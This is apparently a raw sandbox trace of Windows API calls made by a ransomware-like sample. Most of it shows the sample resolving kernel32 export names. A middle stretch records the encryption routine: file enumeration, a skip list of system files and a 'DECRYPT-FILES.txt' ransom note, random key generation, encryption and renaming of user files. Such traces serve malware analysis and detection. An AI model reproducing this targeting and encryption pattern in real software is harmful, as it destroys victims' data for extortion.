(lpString="DELETEFILEW") returned 11 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.331] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.331] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.332] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.332] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.332] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.332] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.332] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.332] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.332] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.332] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.332] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.332] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.332] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.332] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.332] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.332] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.332] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.332] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.332] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.332] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.333] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.333] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.333] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.333] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.333] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.333] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.333] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.333] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.333] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.333] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.333] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.334] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.334] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.334] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4") returned 54 [0082.334] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4.UYPzEm") returned 61 [0082.334] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oprd.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4.UYPzEm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oprd.mp4.uypzem"), dwFlags=0x0) returned 1 [0082.335] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.335] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.335] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.335] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c86f160, ftCreationTime.dwHighDateTime=0x1d4c80d, ftLastAccessTime.dwLowDateTime=0x73094240, ftLastAccessTime.dwHighDateTime=0x1d4d3f2, ftLastWriteTime.dwLowDateTime=0x73094240, ftLastWriteTime.dwHighDateTime=0x1d4d3f2, nFileSizeHigh=0x0, nFileSizeLow=0xabf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="OZb0saJ7yhNqb-p SoK.doc", cAlternateFileName="OZB0SA~1.DOC")) returned 1 [0082.335] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="DECRYPT-FILES.txt") returned 1 [0082.335] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="autorun.inf") returned 1 [0082.335] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="boot.ini") returned 1 [0082.335] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="desktop.ini") returned 1 [0082.336] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="ntuser.dat") returned 1 [0082.336] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="iconcache.db") returned 1 [0082.336] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="bootsect.bak") returned 1 [0082.336] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="ntuser.dat.log") returned 1 [0082.336] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="thumbs.db") returned -1 [0082.336] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc", lpString2="Bootfont.bin") returned 1 [0082.336] lstrlenW (lpString="OZb0saJ7yhNqb-p SoK.doc") returned 23 [0082.336] lstrcmpiW (lpString1="doc", lpString2="lnk") returned -1 [0082.336] lstrcmpiW (lpString1="doc", lpString2="exe") returned -1 [0082.336] lstrcmpiW (lpString1="doc", lpString2="sys") returned -1 [0082.336] lstrcmpiW (lpString1="doc", lpString2="dll") returned 1 [0082.336] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.336] lstrlenW (lpString="OZb0saJ7yhNqb-p SoK.doc") returned 23 [0082.336] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.336] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="OZb0saJ7yhNqb-p SoK.doc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc" [0082.336] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ozb0saj7yhnqb-p sok.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.336] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=44018) returned 1 [0082.336] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.336] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.337] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.337] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.337] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.337] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.337] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.338] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.338] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.339] CloseHandle (hObject=0x444) returned 1 [0082.339] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.339] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.340] CloseHandle (hObject=0x0) returned 0 [0082.340] CloseHandle (hObject=0x440) returned 1 [0082.340] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.340] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.340] GetTickCount () returned 0x114d0f6 [0082.340] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.341] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.341] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.341] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.341] lstrlenA (lpString="kernel32.dll") returned 12 [0082.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.341] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.341] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.341] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.341] lstrlenA (lpString="ADDATOMA") returned 8 [0082.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.341] lstrlenA (lpString="ADDATOMW") returned 8 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.342] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.342] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.342] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.342] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.342] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.342] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.342] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.342] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.342] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.342] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.342] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.342] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.342] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.342] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.342] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.342] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.342] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.342] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.343] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.343] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.343] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.343] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.343] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.343] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.343] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.343] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.343] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.343] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.343] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.343] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.343] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.343] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.343] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.343] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.343] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.343] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.344] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.344] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.344] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.344] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.344] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.344] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.344] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.344] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.344] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.344] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, 